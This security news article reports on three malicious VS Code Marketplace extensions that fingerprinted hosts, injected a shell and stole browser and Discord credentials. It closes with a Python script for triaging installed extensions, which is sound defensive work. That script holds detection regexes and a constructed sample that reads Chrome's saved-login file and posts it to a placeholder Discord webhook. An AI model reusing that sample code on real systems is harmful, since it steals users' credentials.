Malicious VSCode Extensions Steal User Passwords and Open Shells
The popularity of Microsoft Visual Studio Code (VS Code) has made it a prime target for attackers looking to reach developers. This article covers malicious VS Code extensions found on Microsoft's own Marketplace that steal passwords and other sensitive data and even open a remote shell on affected systems, and the measures developers can take to protect their machines and their data.
Cyber criminals have begun to target Microsoft's VSCode Marketplace, uploading three malicious Visual Studio Code extensions that were downloaded a combined 46,600 times by Windows developers.
The malicious code allowed threat actors to steal credentials and system information and to install a remote shell on the victim's machine, according to Check Point, whose analysts found the extensions and reported them to Microsoft.
The extensions were identified and reported on May 4, 2023, and were removed from the VSCode Marketplace on May 14, 2023.
Removal from the Marketplace does not uninstall anything: software developers who still have the harmful extensions installed must remove them manually and run a full scan to detect any remaining infection.
Malicious cases on the VSCode Marketplace
Visual Studio Code (VS Code) is a source-code editor published by Microsoft and used by a large share of professional software developers worldwide.
Microsoft also operates an extensions market for the IDE called the VSCode Marketplace, which offers over 50,000 add-ons that extend the application's functionality and provide more customization options.
The malicious extensions discovered by Check Point researchers are the following:
'Theme Darcula dark' – Described as "an attempt to improve Dracula colors consistency on VS Code," this extension was used to steal basic information about the developer's system, including hostname, operating system, CPU platform, total memory, and information about the CPU.
Although the extension contained no other malicious functionality, collecting host details is not behavior expected of a theme pack, which should ship only color definitions and no executable code.
This extension had the most circulation by far, downloaded over 45,000 times.
Darcula extension on the VSCode Marketplace (Check Point)
'python-vscode' – This extension was downloaded 1,384 times despite an empty description and an uploader name of 'testUseracc1111', showing that a plausible name alone is enough to attract installs. Analysis of its code showed that it is a C# shell injector that can execute code or commands on the victim's machine.
Obfuscated C# code injector (Check Point)
'prettiest java' – Judging by its name and description, it was created to mimic the popular 'prettier java' code formatter. In reality it stole saved credentials and authentication tokens from Discord and Discord Canary, Google Chrome, Opera, Brave Browser, and Yandex Browser and sent them to the attackers over a Discord webhook.
The extension has had 278 installations.
Searching for local secrets (Check Point)
Check Point also found several suspicious extensions that could not be classified as malicious with certainty but showed unsafe behavior, such as fetching code from private repositories or downloading files at runtime.
Software repositories come with risk
Software repositories that accept user contributions, such as npm and PyPI, have proven time and again to be risky, as they are a popular target for threat actors.
While the VSCode Marketplace is only now starting to be targeted, Aquasec concluded in January that it was fairly easy to upload malicious extensions to the VSCode Marketplace and presented some highly suspicious cases, though it was not able to find any actual malware at the time.
The cases discovered by Check Point show that threat actors are now actively attempting to infect Windows developers through malicious submissions, exactly as they do in other software repositories such as npm and PyPI.
Users of the VSCode Marketplace, and of any repository that accepts user submissions, are advised to install only extensions from trusted publishers with many downloads and community ratings, to read user reviews, and to inspect an extension's source code before installing it.
The Threat Landscape
The growing number of third-party VS Code extensions has opened a door for cyber criminals to distribute malicious code. An extension runs inside the editor's extension host with full Node.js capabilities and the privileges of the logged-in user, so once installed it can carry out unauthorized activity on the system without any further exploit. Attackers disguise their extensions as legitimate ones, for example by imitating the name of a popular tool as 'prettiest java' did, or inject malicious code into otherwise harmless ones. Users typically install them unknowingly, putting personal and professional data at risk.
Stealing Passwords and Sensitive Data
Once installed, a malicious VS Code extension can silently harvest sensitive information, including passwords, authentication tokens, API keys, and other confidential data, for instance by reading the browser and Discord credential stores that 'prettiest java' targeted. The stolen data gives attackers unauthorized access to user accounts, compromising not only personal data but potentially exposing sensitive business information or financial details as well.
Opening Remote Shells and Unauthorized Access
In addition to data theft, a malicious extension can go a step further and grant attackers remote access. Because the extension already executes code on the machine, no vulnerability needs to be exploited: backdoor functionality built into the extension, like the shell injector in 'python-vscode', is enough to give the attacker a remote shell on the affected system. From there they can execute arbitrary commands, take control of the compromised machine, and potentially pivot to other systems on connected networks.
Identifying and Mitigating the Risks
To protect yourself from malicious extensions, remain vigilant and take some basic precautions. Review an extension's publisher and reputation before installing it: stick to well-known publishers, check the download count and ratings, and read user reviews. Keep VS Code and your installed extensions up to date so that you receive security patches and bug fixes.
Also consider security tooling that can detect or block malicious extensions. Antivirus software, network firewalls, and intrusion detection systems add further layers of defense, for instance by flagging reads of browser credential databases or unexpected outbound connections originating from the VS Code process. Stay informed through security advisories and follow the guidance of trusted sources such as Microsoft and security researchers.
Reporting and Removing Malicious Extensions
If you come across a suspicious or potentially malicious VS Code extension, report it promptly: Microsoft provides channels for reporting such extensions, and each report helps protect other users from the same threat. Remove any installed extension that raises suspicion or has been identified as malicious, and periodically review your installed extensions, uninstalling those you no longer need, to reduce your attack surface.
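The advice above to inspect an extension's source before installing it and to review what is already installed can be partly automated. The script below is an added example for this page, not Check Point's tooling and not part of VS Code: it walks a directory of unpacked extensions, reads each package.json, and flags the three patterns described in the article. A theme pack that declares a 'main' entry point or activation events (a theme should ship no code, as 'Theme Darcula dark' did anyway), JavaScript that spawns processes, reads browser or Discord credential stores, fingerprints the host, or posts to a Discord webhook. The indicator list is a constructed, illustrative heuristic, and the three sample extensions it builds in a temporary directory are constructed stand-ins, not the real malicious packages.

```python
"""Offline triage of unpacked VS Code extensions for the behaviours discussed
on this page. Example code added to the article; the indicator list and the
sample extensions are constructed for illustration."""
import json
import re
import tempfile
from pathlib import Path

# (regex over the extension's JavaScript, label, weight). Constructed heuristic.
INDICATORS = [
    (r"\bchild_process\b|\bexecSync\s*\(|\bspawn\s*\(", "spawns processes / shell", 3),
    (r"discord(?:app)?\.com/api/webhooks/", "Discord webhook URL (exfiltration channel)", 3),
    (r"\bos\.(?:hostname|cpus|totalmem|platform)\s*\(", "host fingerprinting", 1),
    (r"Login Data|leveldb|Local Storage|discordcanary", "browser/Discord credential store paths", 3),
    (r"\beval\s*\(|new Function\s*\(|String\.fromCharCode", "obfuscation / dynamic code", 2),
]
THEME_ONLY = {"themes", "iconThemes", "productIconThemes"}


def triage_extension(ext_dir: Path) -> dict:
    """Return {'id', 'findings', 'score'} for one unpacked extension folder."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    findings, score = [], 0
    contributes = manifest.get("contributes", {})
    # A pure theme contributes only theme entries and needs no entry point at all.
    theme_only = bool(contributes) and set(contributes) <= THEME_ONLY
    has_code = "main" in manifest or bool(manifest.get("activationEvents"))
    if theme_only and has_code:
        findings.append("theme pack declares 'main'/activationEvents (ships executable code)")
        score += 3
    js_text = "\n".join(p.read_text(encoding="utf-8", errors="replace") for p in ext_dir.rglob("*.js"))
    for pattern, label, weight in INDICATORS:
        if re.search(pattern, js_text):
            findings.append(label)
            score += weight
    ext_id = f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}"
    return {"id": ext_id, "findings": findings, "score": score}


def triage_all(extensions_root: Path) -> list:
    """Triage every extension folder under the root, highest score first."""
    results = [triage_extension(d) for d in sorted(extensions_root.iterdir())
               if (d / "package.json").exists()]
    return sorted(results, key=lambda r: -r["score"])


def build_sample_root() -> Path:
    """Create three constructed sample extensions in a temp dir (not real packages)."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-"))

    def write(folder, manifest, js=None):
        d = root / folder
        d.mkdir()
        (d / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
        if js is not None:
            (d / "extension.js").write_text(js, encoding="utf-8")

    # 1. A theme that declares an entry point and fingerprints the host.
    write("someone.dark-theme-0.0.1",
          {"name": "dark-theme", "publisher": "someone", "main": "./extension.js",
           "activationEvents": ["*"],
           "contributes": {"themes": [{"label": "Dark", "path": "./t.json"}]}},
          "const os=require('os');"
          "const d={h:os.hostname(),p:os.platform(),m:os.totalmem(),c:os.cpus()};")
    # 2. A 'formatter' that reads a browser credential store and posts it to a Discord webhook.
    write("someone.pretty-fmt-0.0.1",
          {"name": "pretty-fmt", "publisher": "someone", "main": "./extension.js",
           "contributes": {"commands": [{"command": "fmt.run", "title": "Format"}]}},
          "const fs=require('fs');"
          "const p=process.env.LOCALAPPDATA+'/Google/Chrome/User Data/Default/Login Data';"
          "fetch('https://discord.com/api/webhooks/000/xxx',{method:'POST',body:fs.readFileSync(p)});")
    # 3. A benign theme: manifest only, no entry point, no JavaScript.
    write("someone.clean-theme-0.0.1",
          {"name": "clean-theme", "publisher": "someone",
           "contributes": {"themes": [{"label": "Clean", "path": "./t.json"}]}})
    return root


if __name__ == "__main__":
    for r in triage_all(build_sample_root()):
        print(f"{r['score']:2d}  {r['id']}: {r['findings'] or 'nothing flagged'}")
```

To run it against a real installation, point triage_all at the extensions directory VS Code uses (~/.vscode/extensions on Linux and macOS, %USERPROFILE%\.vscode\extensions on Windows). To vet an extension before installing it, download its .vsix (a zip archive), unpack it, and pass the extension/ folder inside to triage_extension. A score is a prompt for manual review, not a verdict: a legitimate tool may spawn processes, and obfuscated malware may match none of these strings.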
Conclusion
The presence of malicious Microsoft VS Code extensions poses significant security risks, including password theft and unauthorized remote access. By understanding these risks and adopting proactive security measures, users can better protect themselves from falling victim to such attacks. Stay cautious, verify extension credibility, and report any suspicious activity to ensure a safer experience with VS Code.